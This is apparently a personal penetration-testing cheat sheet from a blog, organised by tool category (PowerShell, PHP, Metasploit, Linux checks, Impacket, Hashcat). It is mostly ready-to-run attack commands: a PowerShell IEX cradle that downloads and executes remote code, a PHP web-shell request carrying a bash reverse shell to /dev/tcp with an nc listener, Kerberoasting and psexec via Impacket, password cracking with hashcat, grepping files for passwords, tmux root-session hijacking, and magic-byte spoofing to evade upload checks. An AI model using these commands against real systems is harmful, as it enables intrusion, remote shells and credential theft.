Categorieën
Powershell tips Uncategorized

Powershell

Encode BASE64

  • cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
  • nc -lvnp 9001 (listener)
  • $username = ‘username’
  • $password = ‘password’
  • $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
  • $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
  • enter-pssession -computername x.x.x.x -Port 5985 -credential $credential

*powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.9:8000/exploit.html‘)”

Categorieën
Port Knocking Uncategorized

Port Knocking

Check for port knock services

  • /etc/init.d$ ls
  • less knockd

Check config file

  • etc/default/knowckd

Run tcp packet on required ports

*for i in 571 290 911; do nmap -Pn -p $i –host-timeout 201 –max-retries 0 x.x.x.x; done

Categorieën
PHP Uncategorized

PHP

PHP

Upload php code exec script

https://www.acunetix.com/websitesecurity/php-security-2/

PHP shell

in url go to shell.php?command=whoami

In Burpsuite create post request

POST /url/shell.php HTTP/1.1 content command=bash -c ‘bash -i >& /dev/tcp/x.x.x.x/4444 0>&1′

URL encode it to command=bash+-c+’bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261’

Setup NC to listen for incoming connections nc -lvnp x.x.x.x 4444

Categorieën
Nessus Uncategorized

Nessus

/etc/init.d/nessusd start https://127.0.0.1:8834

Categorieën
Metasploit

Metasploit tips

systemctl start postgresql
cp /usr/share/exploitdb/exploits/cgi/webapps/42344.rb /root/.msf4/modules/exploits/cgi/webapps/
updatedb

sessions -u
  • search delivery for web payload deliver
  • search autoroute for session routes
  • search smb_version
  • search arp_sweep

Vulnerability Scanning in Metasploit

db_nmap -v --script vuln 192.168.0.184
  • hosts
  • services

Port forwaring

portfwd add –l 3389 –p 3389 –r target-host

Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell

Categorieën
Magic Bytes Change Uncategorized

Change Magic Bytes of files

*python -c ‘print “\x47\x49\x46\x38\x37\x61″‘ > test.txt *https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/

Categorieën
Linux Checks Uncategorized

Linux Checks

Hostname

hostname

Kernel Version

uname -a

Operating System

Related command cat /etc/issue

Running processes

ps auxw

Running services

netstat -antp

Lookup folders

  • ls /

Look SUID files

  • find / -perm -4000 2>/dev/null

tmux migration

  • Running ps aux reveals a tmux session being run as the root user.
  • Simply running the command tmux -S /.devs/dev_sess will connect to the session, with full root privileges.

 

GREP password in files

*grep -Ri password | less

 

Linux process monitor

#!/bin/bash

#loop by line IFS=$'\n'

old_process=$(ps -eo command)

while true; do new_process=$(ps -eo command) diff <(echo "$old_process") <(echo "$new_process") sleep 1 old_process=$new_process done

 

Check for GTFOBins

  • run sudo -l to check which commands you can execute under sudo rights
  • check https://gtfobins.github.io/ for commands to escalate to root

Check linux read to read/write options

 

*check you have read permissions on files ls -la *check to of location you do have write permissions *mkdir writelocation *cp -r /target/folder /writelocation

Categorieën
IPTABLES Uncategorized

IPTABLES

NAT & Port Forwarding

  • iptables -A OUTPUT -o eth1 -j ACCEPT
  • iptables -A INPUT -i eth1 -j ACCEPT
  • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  • iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
  • iptables-save > /etc/iptables/rules.v4
Categorieën
Impacker Uncategorized

Impacker

GetADUsers.py -all -dc-ip X.X.X.X domain/username

psexec.py domain/user@x.x.x.x

GetUserSPNs.py -request -dc-ip x.x.x.x domain/user (to check kerberos tickets) after this hashcat results

Categorieën
Hashcat Uncategorized

Hashcat

nhashcat -m 1500 -a 0 hash /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt –force